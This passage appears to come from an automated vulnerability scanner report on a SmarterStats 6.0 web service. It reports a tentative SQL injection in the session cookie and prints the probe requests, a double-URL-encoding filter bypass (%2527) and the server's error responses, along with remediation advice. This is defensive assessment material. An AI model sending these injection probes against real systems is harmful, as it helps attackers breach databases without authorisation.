&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetAllSites2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

</span>









</body>
</html>

2.6. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASP.NET_SessionId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ASP.NET_SessionId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%2527; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:35:31 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%2527%2527; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:35:32 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 25993
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSiteWithFTP2</h2>
<p class="intro">Adds a site with ftp logs to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSiteWithFTP2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Directory:</td>
<td><input class="frmInput" type="text" size="50" name="Directory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyType:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyType"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyAddress:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyAddress"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPort:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPort"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyUserName:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPassword:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Server:</td>
<td><input class="frmInput" type="text" size="50" name="Server"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Port:</td>
<td><input class="frmInput" type="text" size="50" name="Port"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Username:</td>
<td><input class="frmInput" type="text" size="50" name="Username"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Password:</td>
<td><input class="frmInput" type="text" size="50" name="Password"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IntervalHours:</td>
<td><input class="frmInput" type="text" size="50" name="IntervalHours"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSiteWithFTP2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
